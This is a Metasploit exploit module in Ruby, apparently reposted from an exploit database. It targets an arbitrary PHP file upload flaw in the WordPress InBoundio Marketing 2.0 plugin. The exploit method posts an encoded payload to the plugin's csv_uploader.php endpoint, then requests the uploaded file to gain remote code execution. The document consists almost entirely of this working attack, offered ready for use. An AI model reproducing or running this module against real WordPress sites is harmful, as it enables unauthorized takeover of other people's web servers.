###########################

# WordPress InBoundio Marketing 2.0 Shell Upload vulnerability

###########################

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress InBoundio Marketing PHP Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary file upload in the WordPress InBoundio Marketing version
        2.0. It allows to upload arbitrary php files and get remote code execution. This module
        has been tested successfully on WordPress InBoundio Marketing 2.0.3 with Wordpress 4.1.3 on
        Ubuntu 14.04 Server.
      },
      'Author'         =>
        [
          'KedAns-Dz', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['EDB', '36478'],
          ['OSVDB', '119890'],
          ['WPVDB', '7864']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['InBoundio Marketing 2.0', {}]],
      'DisclosureDate' => 'Mar 24 2015',
      'DefaultTarget'  => 0)
    )
  end

  def check
    check_plugin_version_from_readme('inboundio-marketing')
  end

  def exploit
    php_page_name = rand_text_alpha(8 + rand(8)) + '.php'

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{php_page_name}\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri'       => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'csv_uploader.php'),
      'method'    => 'POST',
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => post_data
    )

    if res
      if res.code == 200 && res.body.include?(php_page_name)
        print_good("#{peer} - Our payload is at: #{php_page_name}.")
        register_files_for_cleanup(php_page_name)
      else
        fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not answer')
    end

    print_status("#{peer} - Calling payload...")
    send_request_cgi(
      { 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_page_name) },
      5
    )
  end
end

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2015-04-25]

###########################